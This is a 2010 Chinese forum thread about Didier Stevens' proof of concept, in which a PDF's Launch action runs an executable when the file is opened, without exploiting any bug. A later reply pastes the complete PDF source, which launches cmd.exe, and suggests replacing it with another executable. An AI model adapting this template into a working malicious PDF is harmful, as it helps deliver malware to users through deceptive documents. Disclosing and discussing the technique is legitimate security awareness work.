找回密码
 欢迎注册
查看: 17481|回复: 14

[转载] 不通过漏洞也可利用PDF执行恶意程序

[复制链接]
发表于 2010-4-1 15:30:48 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?欢迎注册

×
安全研究人员Didier Stevens在本周发表一概念性验证程序,展示如何通过Adobe Reader的功能,而不必透过任何安全漏洞,就可在PDF文件中嵌入可执行程序。 Stevens所设计的PDF档案夹带了一个可执行程序,一旦使用者开启该PDF文件,就会启动所嵌入的可执行程序,虽然Adobe Reader会跳出一个警告窗口,提醒用户此一程序可能是恶意软件,但Stevens进一步发现他能够修改警告窗口内的档案描述文字,因此更可藉由社会工程学以欺诈用户允许该文件的执行。 Stevens强调,他所利用的并不是Adobe Reader的安全漏洞,而是由PDF语言的规格衍生而来。 对于Stevens的发现,F-Secure的首席执行官Mikko Hypponen表示,PDF文件格式的规格显示PDF允许用户嵌入各式内容,包括影片、声音、3D对象,亦可启动应用程序及JavaScript。Hypponen质疑用户为什么需要这些功能,并揶揄PDF有这么多规格难怪启动Adobe Reader或加载所有插件需要一点时间,而且不意外的,Adobe Reader会定期出现安全问题。 Stevens说,唯一可阻止程序执行的是Adobe Reader跳出的警告窗口,另一PDF阅读工具Foxit Reader也受到影响,但因该装置完全不会警告用户就径自执行程序,因此问题更为严重。 Hypponen则建议用户不要把网络上的PDF文件下载到个人计算机上,而是透过Google Docs等云端服务开启,另外也提醒使用者可以采用较冷门的PDF阅读工具以避免招惹黑客攻击。 来源:http://www.cnbeta.com/articles/107639.htm
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
 楼主| 发表于 2010-4-1 16:17:04 | 显示全部楼层
哈哈,我用的是pdf-Xchange,很强大,但非主流,谁要是感兴趣,可以用Adobe打开这个zip里面的 pdf体验一下: http://didierstevens.com/files/data/launch-action-cmd.zip 参考资源: http://software.solidot.org/article.pl?sid=10/04/01/0043252
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
发表于 2010-4-1 17:37:11 | 显示全部楼层
4月1日吧?
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
 楼主| 发表于 2010-4-2 09:14:31 | 显示全部楼层
我怨啊,
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
发表于 2010-4-2 09:55:48 | 显示全部楼层
我开始也以为是真的,过来想想4.1才保留怀疑意见的
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
发表于 2010-4-2 10:08:41 | 显示全部楼层
我怨啊, wayne 发表于 2010-4-2 09:14
是怨?还是冤?
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
发表于 2010-4-2 10:10:16 | 显示全部楼层
应该都有吧,呵呵
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
 楼主| 发表于 2010-4-2 10:42:45 | 显示全部楼层
这信息是真的, 我是既冤又怨啊 IE,Adobe reader ,Adobe flash,是非常 有名的漏洞王。 这是那个zip文件里的pdf的源码,你用文本阅读器就可以打开,内容如下:
  1. %PDF-1.1
  2. 1 0 obj
  3. <<
  4. /Type /Catalog
  5. /Outlines 2 0 R
  6. /Pages 3 0 R
  7. /OpenAction 8 0 R
  8. >>
  9. endobj
  10. 2 0 obj
  11. <<
  12. /Type /Outlines
  13. /Count 0
  14. >>
  15. endobj
  16. 3 0 obj
  17. <<
  18. /Type /Pages
  19. /Kids [4 0 R]
  20. /Count 1
  21. >>
  22. endobj
  23. 4 0 obj
  24. <<
  25. /Type /Page
  26. /Parent 3 0 R
  27. /MediaBox [0 0 612 792]
  28. /Contents 5 0 R
  29. /Resources
  30. << /ProcSet 6 0 R
  31. /Font << /F1 7 0 R >>
  32. >>
  33. >>
  34. endobj
  35. 5 0 obj
  36. << /Length 46 >>
  37. stream
  38. BT
  39. /F1 24 Tf
  40. 100 700 Td
  41. (Hello World)Tj
  42. ET
  43. endstream
  44. endobj
  45. 6 0 obj
  46. [/PDF /Text]
  47. endobj
  48. 7 0 obj
  49. <<
  50. /Type /Font
  51. /Subtype /Type1
  52. /Name /F1
  53. /BaseFont /Helvetica
  54. /Encoding /MacRomanEncoding
  55. >>
  56. endobj
  57. 8 0 obj
  58. <<
  59. /Type /Action
  60. /S /Launch
  61. /Win
  62. <<
  63. /F (cmd.exe)
  64. >>
  65. >>
  66. endobj
  67. xref
  68. 0 9
  69. 0000000000 65535 f
  70. 0000000012 00000 n
  71. 0000000109 00000 n
  72. 0000000165 00000 n
  73. 0000000234 00000 n
  74. 0000000401 00000 n
  75. 0000000505 00000 n
  76. 0000000662 00000 n
  77. trailer
  78. <<
  79. /Size 9
  80. /Root 1 0 R
  81. >>
  82. startxref
  83. 751
  84. %%EOF
复制代码
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
发表于 2010-4-2 10:52:14 | 显示全部楼层
用 ADOBE READER 9.3.1 打开,弹出如下对话框: pdf.png
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
 楼主| 发表于 2010-4-2 10:55:29 | 显示全部楼层
这个只是演示程序。 试想,如果我把8楼源码里的71行改成其他的可执行文件,那会是什么情况呢?
毋因群疑而阻独见  毋任己意而废人言
毋私小惠而伤大体  毋借公论以快私情
您需要登录后才可以回帖 登录 | 欢迎注册

本版积分规则

小黑屋|手机版|数学研发网 ( 苏ICP备07505100号 )

GMT+8, 2024-12-22 12:13 , Processed in 0.078215 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表